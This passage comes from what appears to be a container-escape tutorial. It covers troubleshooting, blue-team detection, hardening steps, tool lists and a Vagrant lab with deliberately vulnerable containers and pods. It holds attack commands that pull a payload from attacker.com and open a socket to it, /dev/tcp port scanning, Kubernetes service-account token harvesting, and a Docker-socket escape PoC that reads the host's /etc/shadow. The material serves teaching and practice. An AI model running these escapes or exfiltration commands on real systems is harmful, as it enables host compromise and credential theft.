sysctl -a | grep -E 'dmesg|kptr_restrict|perf_event_paranoid|protected_hardlinks|protected_symlinks|unprivileged_bpf_disabled'

Check for security modules:

# Is AppArmor enabled?
cat /proc/self/attr/current

# Is SELinux enabled?
getenforce 2>/dev/null || echo "No SELinux"

# Check seccomp status
grep Seccomp /proc/self/status

Verify container configuration:

# Check if you're really in a container
grep -q 'docker\|lxc\|containerd' /proc/1/cgroup && echo "In container" || echo "Not in container"

# Verify capabilities
capsh --print

# Check your current namespaces
ls -la /proc/self/ns/

Escaping Without Common Tools

Problem: Target container has minimal tools installed.

Solution:

Use statically compiled binaries:

# If you can transfer files, use statically compiled tools
# Example: Statically compiled busybox
chmod +x ./busybox
./busybox wget http://attacker.com/payload -O /tmp/payload

Create temporary scripts:

# Create a temporary Python script if Python is available
cat > /tmp/simple_http.py << 'EOF'
import socket
s = socket.socket()
s.connect(('attacker.com', 4444))
s.send(b'Container escaped!\n')
EOF
python /tmp/simple_http.py

Use bash built-ins:

# Instead of curl
exec 3<>/dev/tcp/google.com/80
echo -e "GET / HTTP/1.1\r\nHost: google.com\r\n\r\n" >&3
cat <&3

# Instead of wget
(echo -e "GET /file HTTP/1.1\r\nHost: example.com\r\n\r\n"; sleep 1) > /dev/tcp/example.com/80 < /dev/tcp/example.com/80 > file

# Network scanning without nmap
for port in {1..1024}; do (echo >/dev/tcp/target-host/$port) >/dev/null 2>&1 && echo "Port $port open"; done

Improved Error Handling in Exploits

Always add robust error handling to your container escape scripts:

#!/bin/bash
# robust_escape.sh - Container escape with error handling

# Enable error tracing
set -e

# Logging function
log() {
    echo "[$(date +%T)] $1"
}

# Error handling function
handle_error() {
    local error_code=$?
    log "ERROR: Command failed with exit code $error_code"
    log "ERROR: Line that failed: ${BASH_COMMAND}"
    
    # Attempt cleanup
    log "Attempting cleanup..."
    # Add your cleanup commands here
    
    exit $error_code
}

# Set error handler
trap handle_error ERR

# Main escape function
escape_container() {
    log "Starting container escape"
    
    # Check prerequisites
    log "Checking prerequisites"
    if [ ! -S /var/run/docker.sock ]; then
        log "Docker socket not found, trying alternative methods"
        # Try alternative methods
        return 1
    fi
    
    log "Docker socket found, proceeding with escape"
    # Rest of escape code
    # ...
    
    return 0
}

# Alternative method if primary fails
alternative_escape() {
    log "Attempting alternative escape method"
    # Alternative escape code
    # ...
}

# Main execution
log "Starting escape sequence"

if ! escape_container; then
    log "Primary escape failed, trying alternative"
    alternative_escape
fi

log "Escape sequence completed"

Dealing with Restricted Network Access

When containers have limited network access:

# Check network connectivity
ip a
ip route
cat /etc/resolv.conf

# Test DNS resolution
host google.com || echo "DNS not working"

# Test outbound connectivity
timeout 5 bash -c "</dev/tcp/8.8.8.8/53" && echo "Network access available" || echo "No network access"

# If IPv4 is blocked, try IPv6
timeout 5 bash -c "</dev/tcp/[2001:4860:4860::8888]/53" && echo "IPv6 available" || echo "No IPv6 access"

# Check if you can reach the host network
# If you have hostNetwork: true in Kubernetes or --network=host in Docker
for ip in $(ip route | grep -v 'default' | cut -d' ' -f1); do
  echo "Checking subnet $ip"
  for host in $(seq 1 254); do
    timeout 0.1 bash -c "</dev/tcp/$ip.$host/22" 2>/dev/null && echo "Host found: $ip.$host with SSH open"
  done
done

Kubernetes Troubleshooting

Common issues with Kubernetes-specific escape techniques:

# 1. Service account token issues
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
if [ -z "$TOKEN" ]; then
    echo "No service account token found"
    # Try alternative locations
    for path in /run/secrets/kubernetes.io/serviceaccount /secrets/token; do
        if [ -f "$path/token" ]; then
            TOKEN=$(cat "$path/token")
            echo "Found token at $path/token"
            break
        fi
    done
fi

# 2. API server access issues
API_SERVER="https://kubernetes.default.svc"
if ! curl -k -s "$API_SERVER/healthz" > /dev/null; then
    echo "Cannot reach API server at $API_SERVER"
    # Try alternative discovery
    for subnet in 10.0.0 10.100.0 10.96.0 172.17.0; do
        for i in {1..10}; do
            if curl -k -s --connect-timeout 1 "https://$subnet.$i:443/healthz" > /dev/null; then
                echo "Found potential API server at $subnet.$i"
                API_SERVER="https://$subnet.$i:443"
                break 2
            fi
        done
    done
fi

# 3. Permission issues
if ! curl -k -s -H "Authorization: Bearer $TOKEN" "$API_SERVER/api/v1/namespaces" > /dev/null; then
    echo "Permission denied with current token"
    # Check what permissions we do have
    curl -k -s -H "Authorization: Bearer $TOKEN" \
      "$API_SERVER/apis/authorization.k8s.io/v1/selfsubjectrulesreviews" \
      -X POST -H "Content-Type: application/json" \
      -d '{"kind":"SelfSubjectRulesReview","apiVersion":"authorization.k8s.io/v1","spec":{"namespace":"default"}}'
fi

Blue Team: Detecting Escape Attempts

For defenders, identifying escape attempts is crucial:

# 1. Monitor for suspicious processes
grep -l docker /proc/*/cgroup 2>/dev/null | grep -v "^/proc/$$/cgroup$" | while read -r proc_cgroup; do
    pid=$(echo "$proc_cgroup" | cut -d/ -f3)
    cmd=$(cat "/proc/$pid/cmdline" 2>/dev/null | tr '\0' ' ')
    echo "Container process $pid running: $cmd"
done

# 2. Check for unexpected capabilities
find /proc/*/status 2>/dev/null | xargs grep -l "CapEff:" | while read -r proc_status; do
    pid=$(echo "$proc_status" | cut -d/ -f3)
    caps=$(grep "CapEff:" "$proc_status" | awk '{print $2}')
    
    # Convert hex to binary and count set bits
    cap_count=$(printf "%x" "$caps" | 
                 tr '0123456789abcdef' '0000100010101111' | 
                 tr -d '0' | wc -c)
    
    if [ "$cap_count" -gt 10 ]; then
        echo "Process $pid has $cap_count capabilities: $caps"
        cat "/proc/$pid/cmdline" | tr '\0' ' '
    fi
done

# 3. Monitor for container breakout indicators
watch -n 5 'dmesg | grep -E "SECURITY|AUDIT|WARN" | tail -n 20'

# 4. Monitor Docker socket access
auditctl -w /var/run/docker.sock -p rwxa -k docker_socket_access
ausearch -k docker_socket_access

Key Takeaways & Resources

After years of researching container escapes, here are the most critical lessons:

Core Security Principles

  1. Defense in depth is essential: Never rely on containers as your only security boundary.
  2. Privilege minimization works: Most escapes require privileged access of some kind.
  3. Shared kernels create shared risks: Container isolation will never be as strong as VM isolation.
  4. Configuration matters more than technology: Properly configured containers are reasonably secure; misconfigured ones are trivial to escape.
  5. Security vs. usability tradeoffs: The most secure container configurations are often the least convenient.

For Defenders: Essential Hardening Steps

  1. Never run privileged containers in production
  2. Never mount the Docker socket inside containers
  3. Use read-only root filesystems whenever possible
  4. Implement network policies to limit container communication
  5. Use security contexts and Pod Security Standards in Kubernetes
  6. Keep host kernels and container runtimes updated
  7. Run runtime security monitoring tools
  8. Consider enhanced isolation technologies (gVisor, Kata Containers)

For Attackers: Methodical Approach

  1. Start with reconnaissance to identify the environment
  2. Check for common misconfigurations first
  3. Look for access to the Docker socket or privileged containers
  4. Identify mounted sensitive paths that may enable escapes
  5. Check for service account tokens in Kubernetes environments
  6. Look for kernel vulnerabilities as a last resort
  7. Maintain access once escaped

Comprehensive Container Security Tools

Category Tool Description
Runtime Security Falco Real-time container runtime monitoring
Sysdig Container monitoring and forensics
Aqua Security Commercial container security platform
Vulnerability Scanning Trivy Container and filesystem vulnerability scanner
Clair Static container vulnerability analyzer
Anchore Deep container analysis
Network Security Calico Network policy for Kubernetes
Cilium eBPF-based network security
Istio Service mesh with security features
Configuration Analysis Kube-bench CIS benchmark for Kubernetes
Docker-bench-security CIS benchmark for Docker
Kubesec Security risk analysis for Kubernetes resources
Penetration Testing Kube-hunter Kubernetes penetration testing tool
Amicontained Container introspection tool
Deepce Container enumeration and exploitation tool

Essential References

  1. Official Documentation
  2. Research Papers
    • Understanding and Hardening Linux Containers (NCC Group)
    • A Survey of Container Security (ACM Computing Surveys)
  3. Books
    • Container Security by Liz Rice
    • Kubernetes Security by Liz Rice and Michael Hausenblas
    • Docker Security by Adrian Mouat
  4. Training

Build Your Own Container Security Lab

To practice these techniques safely:

#!/bin/bash
# setup_container_security_lab.sh - Create a comprehensive container security practice lab

echo "[+] Setting up Container Security Lab"

# Create a directory for the lab
mkdir -p ~/container-security-lab
cd ~/container-security-lab

# Create a Vagrantfile for isolated testing
cat > Vagrantfile << 'EOF'
Vagrant.configure("2") do |config|
  config.vm.box = "ubuntu/focal64"
  config.vm.hostname = "container-lab"
  
  # Allocate resources
  config.vm.provider "virtualbox" do |vb|
    vb.memory = 4096
    vb.cpus = 2
    vb.name = "container-security-lab"
  end
  
  # Provision with Docker and Kubernetes tools
  config.vm.provision "shell", inline: <<-SHELL
    # Update and install dependencies
    apt-get update
    apt-get install -y apt-transport-https ca-certificates curl software-properties-common

    # Install Docker
    curl -fsSL https://download.docker.com/linux/ubuntu/gpg | apt-key add -
    add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"
    apt-get update
    apt-get install -y docker-ce docker-ce-cli containerd.io
    usermod -aG docker vagrant

    # Install kubectl
    curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
    chmod +x kubectl
    mv kubectl /usr/local/bin/

    # Install Minikube
    curl -LO https://storage.googleapis.com/minikube/releases/latest/minikube-linux-amd64
    chmod +x minikube-linux-amd64
    mv minikube-linux-amd64 /usr/local/bin/minikube

    # Create directory for lab files
    mkdir -p /home/vagrant/lab
    chown -R vagrant:vagrant /home/vagrant/lab
    
    # Create vulnerable Docker containers
    cat > /home/vagrant/lab/create_vulnerable_containers.sh << 'EOFINNER'
#!/bin/bash
# Create containers with various security issues for practice

# Container with Docker socket mounted
docker run -d --name docker-socket-container -v /var/run/docker.sock:/var/run/docker.sock ubuntu:20.04 sleep infinity

# Privileged container
docker run -d --name privileged-container --privileged ubuntu:20.04 sleep infinity

# Container with host path mounted
docker run -d --name host-mount-container -v /:/host:ro ubuntu:20.04 sleep infinity

# Container with capabilities added
docker run -d --name capabilities-container --cap-add SYS_ADMIN --cap-add SYS_PTRACE ubuntu:20.04 sleep infinity

# Container using host network
docker run -d --name host-network-container --network=host ubuntu:20.04 sleep infinity

# Container with AppArmor disabled
docker run -d --name apparmor-disabled-container --security-opt apparmor=unconfined ubuntu:20.04 sleep infinity

echo "Created vulnerable containers for testing:"
docker ps
EOFINNER
    chmod +x /home/vagrant/lab/create_vulnerable_containers.sh
    
    # Create Minikube setup script
    cat > /home/vagrant/lab/setup_minikube.sh << 'EOFINNER'
#!/bin/bash
# Set up Minikube with vulnerable configurations

# Start Minikube
minikube start --driver=docker

# Create a vulnerable ServiceAccount with excessive permissions
kubectl create serviceaccount vulnerable-sa
kubectl create clusterrolebinding vulnerable-binding --clusterrole=cluster-admin --serviceaccount=default:vulnerable-sa

# Create a vulnerable Pod using the ServiceAccount
cat << EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: vulnerable-pod
spec:
  serviceAccountName: vulnerable-sa
  containers:
  - name: vulnerable-container
    image: ubuntu:20.04
    command: ["sleep", "infinity"]
EOF

# Create a Pod with hostPath
cat << EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: hostpath-pod
spec:
  containers:
  - name: hostpath-container
    image: ubuntu:20.04
    command: ["sleep", "infinity"]
    volumeMounts:
    - mountPath: /host
      name: hostpath
  volumes:
  - name: hostpath
    hostPath:
      path: /
EOF

# Create a privileged Pod
cat << EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: privileged-pod
spec:
  containers:
  - name: privileged-container
    image: ubuntu:20.04
    command: ["sleep", "infinity"]
    securityContext:
      privileged: true
EOF

echo "Created vulnerable Kubernetes resources:"
kubectl get pods,sa
EOFINNER
    chmod +x /home/vagrant/lab/setup_minikube.sh
    
    # Create a README with instructions
    cat > /home/vagrant/lab/README.md << 'EOFINNER'
# Container Security Lab

This lab contains deliberately vulnerable containers and Kubernetes resources for practicing container escape techniques.

## Docker Containers

Run the script to create vulnerable Docker containers:

./create_vulnerable_containers.sh

Then practice escape techniques on each container:

docker exec -it docker-socket-container bash docker exec -it privileged-container bash docker exec -it host-mount-container bash docker exec -it capabilities-container bash docker exec -it host-network-container bash docker exec -it apparmor-disabled-container bash


## Kubernetes Resources

Set up the Minikube cluster with vulnerable resources:

./setup_minikube.sh

Then practice Kubernetes-specific escapes:

kubectl exec -it vulnerable-pod – bash kubectl exec -it hostpath-pod – bash kubectl exec -it privileged-pod – bash


## Safety Warning

This lab is for educational purposes only. All vulnerable configurations should be restricted to this lab environment and never used in production.
EOFINNER
  SHELL
end
EOF

echo "[+] Vagrantfile created"

# Create lab directories
mkdir -p exploits scripts resources

# Add a sample exploit
cat > exploits/docker_socket_escape.sh << 'EOF'
#!/bin/bash
# docker_socket_escape.sh - Simple Docker socket escape demo

echo "[+] Docker Socket Container Escape PoC"

if [ ! -S /var/run/docker.sock ]; then
    echo "[-] Docker socket not found at /var/run/docker.sock"
    exit 1
fi

echo "[+] Docker socket found, creating a privileged container"

CONTAINER_ID=$(curl -s -X POST \
  --unix-socket /var/run/docker.sock \
  -H "Content-Type: application/json" \
  -d '{"Image":"alpine:latest","Cmd":["/bin/sh","-c","sleep 30"],"Binds":["/:/hostfs"],"Privileged":true}' \
  http://localhost/containers/create | grep -o '"Id":"[^"]*' | cut -d '"' -f 4)

if [ -z "$CONTAINER_ID" ]; then
    echo "[-] Failed to create container"
    exit 1
fi

echo "[+] Container created: $CONTAINER_ID"
echo "[+] Starting container"

curl -s -X POST \
  --unix-socket /var/run/docker.sock \
  http://localhost/containers/$CONTAINER_ID/start

echo "[+] Reading host's /etc/shadow file"

curl -s -X POST \
  --unix-socket /var/run/docker.sock \
  -H "Content-Type: application/json" \
  -d '{"AttachStdin":false,"AttachStdout":true,"AttachStderr":true,"Cmd":["cat","/hostfs/etc/shadow"]}' \
  http://localhost/containers/$CONTAINER_ID/exec | grep -o '"Id":"[^"]*' | cut -d '"' -f 4 | xargs -I{} \
  curl -s -X POST --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Detach":false,"Tty":false}' http://localhost/exec/{}/start

echo "[+] Cleaning up container"
curl -s -X DELETE --unix-socket /var/run/docker.sock http://localhost/containers/$CONTAINER_ID?force=true

echo "[+] Escape complete"
EOF
chmod +x exploits/docker_socket_escape.sh

# Create a start script
cat > start_lab.sh << 'EOF'
#!/bin/bash
echo "[+] Starting Container Security Lab"
vagrant up
echo "[+] Lab VM is running. Connect using: vagrant ssh"
echo "[+] Once connected, navigate to ~/lab and follow the README.md instructions"
EOF
chmod +x start_lab.sh

echo "[+] Lab setup complete! Start it with: ./start_lab.sh"

Final Thoughts

Container security is a rapidly evolving field. What makes container escape techniques fascinating is the balance between isolation and usability. Perfect security would render containers unusable for many real-world applications. This inherent tension creates a constantly shifting landscape of vulnerabilities and mitigations.

As you continue your container security journey, remember that both offensive and defensive perspectives are valuable. Understanding how to escape containers makes you better at securing them, and understanding proper container hardening makes you more effective at finding escape vectors.

Keep learning, stay curious, and always practice these techniques responsibly in controlled environments.

Read more